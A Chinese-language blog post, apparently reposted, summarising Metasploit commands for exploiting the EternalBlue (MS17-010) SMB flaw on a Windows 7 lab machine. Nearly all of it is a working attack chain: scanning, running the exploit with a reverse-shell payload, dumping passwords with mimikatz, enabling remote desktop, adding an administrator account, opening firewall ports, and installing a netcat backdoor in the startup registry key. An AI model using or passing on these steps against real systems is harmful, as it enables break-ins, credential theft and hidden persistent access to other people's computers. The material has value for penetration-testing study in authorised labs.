msf永恆之藍漏洞利用命令總結


一、    啟動msf之前的准備工作

root@kali:~#service postgresql start

root@kali:~#msfdb init

root@kali:~#msfconsole

二、    查看是否存在漏洞

msf >search ms17_010尋找所需模塊

msf >use auxiliary/scanner/smb/smb_ms17_010(加載掃描exp)
msf >set RHOSTS 192.168.92.129(設置被掃描IP)
msf >run(進行掃描,觀察是否存在該漏洞)

三、    漏洞攻擊

msf >use exploit/windows/smb/ms17_010_eternalblue (加載攻擊模塊)
msf > set RHOST 192.168.92.129(被攻擊機IP)
msf >set LHOST 192.168.92.132(設置本地IP)
msf >set LPORT 4444(設置連接端口)
msf >set payload windows/x64/meterpreter/reverse_tcp(配置回鏈方式)

msf >show options(查看配置相關信息)
msf >run(或者exploit,開始攻擊)

四、    攻擊成功!查看系統信息

meterpreter>sysinfo爆出系統信息
meterpreter>screenshot截屏,截屏后的圖片存放在/root/中

meterpreter>upload xx.exe C:\yyy\xxx.exe 這條命令可以上傳任意文件,后面會用到,上傳后門

meterpreter >shell 進入靶機cmd
如果連接到windows的shell顯示亂碼,使用如下命令

C:\Windows\system32>chcp 65001

五、    爆破密碼的過程,使用mimikatz

首先查看是否開啟3389端口,如果沒有則使用以下命令在cmd中開啟

C:\Windows\system32>netstat –ano  觀察3389端口是否開啟

C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

C:\Windows\system32>exit

meterpreter > load mimikatz
meterpreter > msv <獲取的賬號信息是hash值>

meterpreter > ssp <獲取的賬號信息是明文信息>

meterpreter > wdigest <讀取內存中存放的賬號密碼明文信息>
meterpreter > kerberos <和上面類似>

六、    連接win7的遠程桌面

重新打開一個命令界面

root@kali:~# rdesktop 192.168.92.129

輸入剛才破解的用戶名和密碼。如果不使用破解的用戶名和密碼也可以自己創建一個用戶名和密碼,但必須賦予創建的賬號相關權限

七、    創建賬號的兩種方法

1.通過shell進入靶機,在靶機里創建用戶賬號,然后添加到administrators用戶組,使其也具有administrators權限,最后查看是否是管理員權限

meterpreter > shell

C:\Windows\system32>net user test1 123456 /add

C:\Windows\system32>net localgroup administrators test1 /add

C:\Windows\system32>net user test1

 

2.利用msf的post后滲透攻擊模塊,直接在meterpreter下創建,這種創建的賬號直接就是administrators權限。

meterpreter > run post/windows/manage/enable_rdp

meterpreter > run post/windows/manage/enable_rdp USERNAME=test1 PASSWORD=12345

 

 

 

八、    上傳后門nc

(ps:如果格式不正確,放在記事本里調一下格式或者換行,正常來說是沒有換行的)

 

首先開啟win7主機默認共享,以便遠程執行命令

C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

開放win7 443端口

C:\Windows\system32> netsh firewall add portopening TCP 443 "test" ENABLE

上傳瑞士軍刀nc.exe到windows主機上

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

將nc添加至啟動項

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

開放win7 443端口

C:\Windows\system32>netsh firewall add portopening TCP 443 ENABLE 

重啟win7並測試后門

C:\Windows\system32>shutdown -r -f -t 0

重新打開一個會話界面測試后門,如果能直接進入靶機的shell,則說明后門上傳成功,以后可以直接通過這條命令連接靶機

root@kali:~# nc -v 192.168.72.128 443

 如果覺得還行,點點關注


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM